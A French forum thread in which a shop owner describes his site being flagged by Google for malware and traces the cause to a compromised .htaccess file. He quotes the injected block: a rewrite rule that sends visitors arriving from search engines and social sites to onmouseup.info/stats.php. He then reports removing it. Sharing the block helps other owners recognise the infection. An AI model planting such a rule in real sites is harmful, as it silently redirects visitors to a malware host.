Jump to content

Logiciel Malvaillant détécté par Google. Que faire ?

Recommended Posts

Bonsoir,

Tout d'abord je m'excuse d'écrire en français mais en anglais je ne vais pas y arriver. Merci aux modos de leur compréhension.

Voici mon problème, depuis hier après midi Google indique que mon site contient un logiciel malvaillant !

Mon site est www.parabd.fr

Voici le diagnostic de google : http://www.google.fr.../www.parabd.fr/

A chaque fois que l'on clique sur un lien du site on est transféré automatiquement sur une site suivant cette url : http://onmouseup.inf...?id_product=236 (exemple)

J'ai remarqué également que pour certains article cela fonctionne correctement et pour d'autres ou la photo ne s'affiche pas on va sur le site ci-dessus.

Avast ce déclanche également confirmant les propos de google concernant le logiciel malvaillant !

Su quelqu'un peux m'aider a me sortir de là ...

Merci pour votre aide que j'espere rapide, car je suis en galère :(

Quentin

PS : dois je mettre le site en maintenance ?

Edited by qb77 (see edit history)

Après pas mal de recherche sur le web, je viens de trouver une information sur inte anglais qui donnerai comme source du problème les .htacess

Et effectivement, ces lignes de commandes semblent anormales et ont été modifié le 21/06/2012 :

#c3284d#

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

RewriteRule ^(.*)$ http://onmouseup.info/stats.php [R=301,L]

</IfModule>

#/c3284d#

J'ai supprimé des lignes, j'attends maintenant la maj de google pour vous confirmer la réparation du problème.

J'espère que cela pourra servir a d'autres !